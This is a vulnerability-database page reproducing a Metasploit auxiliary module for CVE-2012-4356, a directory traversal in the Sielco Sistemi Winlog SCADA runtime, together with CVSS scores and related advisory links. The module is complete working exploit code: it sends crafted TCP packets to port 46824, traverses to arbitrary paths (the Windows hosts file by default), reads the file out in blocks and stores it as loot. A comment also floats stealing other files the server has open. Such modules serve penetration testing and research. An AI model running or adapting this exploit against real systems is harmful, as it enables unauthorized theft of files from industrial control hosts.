Lucene search
Luigi Auriemma, juan vazquez, metasploit.comPACKETSTORM:180950HistoryAug 31, 2024 - 12:00 a.m.
Sielco Sistemi Winlog Remote File Access
2024-08-3100:00:00
Luigi Auriemma, juan vazquez, metasploit.com
packetstormsecurity.com
11
metasploit
directory traversal
vulnerability
sielco sistemi winlog
port 46824
remote file access
CVSS2
4.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
AI Score
7
Confidence
Low
EPSS
0.036
Percentile
91.8%
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Sielco Sistemi Winlog Remote File Access',
'Description' => %q{
This module exploits a directory traversal in Sielco Sistemi Winlog. The vulnerability
exists in the Runtime.exe service and can be triggered by sending a specially crafted packet
to the 46824/TCP port. This module has been successfully tested on Sielco Sistemi Winlog Lite
2.07.14.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', # Vulnerability Discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-4356' ],
[ 'OSVDB', '83275' ],
[ 'BID', '54212' ],
[ 'EDB', '19409'],
[ 'URL', 'http://aluigi.altervista.org/adv/winlog_2-adv.txt' ]
]
))
register_options(
[
Opt::RPORT(46824),
OptString.new('FILEPATH', [true, 'The name of the file to download', '/WINDOWS/system32/drivers/etc/hosts']),
OptInt.new('DEPTH', [true, 'Traversal depth', 10])
])
end
def run_host(ip)
# No point to continue if no filename is specified
if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
print_error("#{ip}:#{rport} - Please supply the name of the file you want to download")
return
end
travs = "../" * datastore['DEPTH']
if datastore['FILEPATH'][0] == "/"
travs << datastore['FILEPATH'][1, datastore['FILEPATH'].length]
else
travs << datastore['FILEPATH']
end
connect
# Open File through _TCPIPS_BinOpenFileFP
packet = "\x00" * 20
packet << "\x78" # Opcode
packet << travs # Path traversal
packet << "\x00"
sock.put(packet)
response = sock.get_once(5, 1) || ''
if response.unpack("C").first != 0x78
print_error "#{ip}:#{rport} - Error opening file"
return
end
# The stream allows to identify our file since the
# server could be handling multiple files simultaneously.
# Since the stream identifier is just an offset in an array
# of opened streams it could be used to guess other files
# opened by the server and stole them :-) just an idea....
stream = response[1, 4]
# Get File Length through _TCPIPS_BinGetFileSizeFP
packet = "\x00" * 20
packet << "\x79" # Opcode
packet << stream # stream
packet << "\x00" * 7
sock.put(packet)
response = sock.get_once(5, 1) || ''
if response.unpack("C").first != 0x79
print_error "#{ip}:#{rport} - Error getting the file length"
return
end
file_length = response[1,4].unpack("V").first
# Read File with the help of _TCPIPS_BinGetStringRecordFP
contents = ""
offset = 0
while contents.length < file_length
packet = "\x00" * 20
packet << "\x98" # Opcode
packet << [offset].pack("V") # offset (blocks of 0x55)
packet << stream # stream
packet << "\x00" * 3
sock.put(packet)
response = ""
while response.length < 0x7ac # Packets of 0x7ac (header (0x9) + block of data (0x7a3))
response << sock.get_once(0x7ac-response.length, 5) || ''
end
if response.unpack("C").first != 0x98
print_error "#{ip}:#{rport} - Error reading the file, anyway we're going to try to finish"
end
if (file_length - contents.length) < response.length - 9
contents << response[9, file_length - contents.length] # last packet
else
contents << response[9, response.length] # no last packet
end
offset = offset + 0x17 # 17 blocks in every packet
end
# Close File through _TCPIPS_BinCloseFileFP
packet = "\x00" * 20
packet << "\x7B"
packet << "\x00" * 11
sock.put(packet)
response = sock.get_once(-1, 1) || ''
if response.unpack("C").first != 0x7B
print_error "#{ip}:#{rport} - Error closing file file, anyway we're going to try to finish"
end
disconnect
print_good "#{ip}:#{rport} - File retrieved successfully!"
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'sielcosistemi.winlog',
'application/octet-stream',
ip,
contents,
fname,
datastore['FILEPATH']
)
print_status("#{ip}:#{rport} - File saved in: #{path}")
end
end
`
Related
metasploit
metasploit
Sielco Sistemi Winlog Remote File Access
2012-07-12 11:12:31
cvelist
cvelist
CVE-2012-4356
2012-08-19 20:00:00
nvd
nvd
CVE-2012-4356
2012-08-19 20:55:01
prion
prion
Directory traversal
2012-08-19 20:55:00
cve
cve
CVE-2012-4356
2012-08-19 20:55:01
nessus
nessus
Sielco Sistemi Winlog < 2.07.17 Multiple Vulnerabilities
2012-09-10 00:00:00
exploitdb
exploitdb
Sielco Sistemi Winlog 2.07.16 - Multiple Vulnerabilities
2012-06-27 00:00:00
openvas
openvas
Sielco Sistemi Winlog Multiple Vulnerabilities
2012-06-28 00:00:00
ics
ics
Sielco Sistemi Winlog Multiple Vulnerabilities (Update A)
2018-09-06 12:00:00
CVSS2
4.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
AI Score
7
Confidence
Low
EPSS
0.036
Percentile
91.8%
Related for PACKETSTORM:180950